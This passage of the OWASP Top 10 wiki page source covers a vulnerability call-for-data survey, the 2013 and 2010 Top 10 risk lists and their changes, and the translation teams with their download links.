* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Efforts are already underway to translate the OWASP Top 10 for 2017. NOTE: This is still a '''release candidate''' so will definitely change before it's final. To avoid rework, you might want to wait until the final is released.If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please let me know you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint]. Please use this document as the basis for your translation efforts. &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
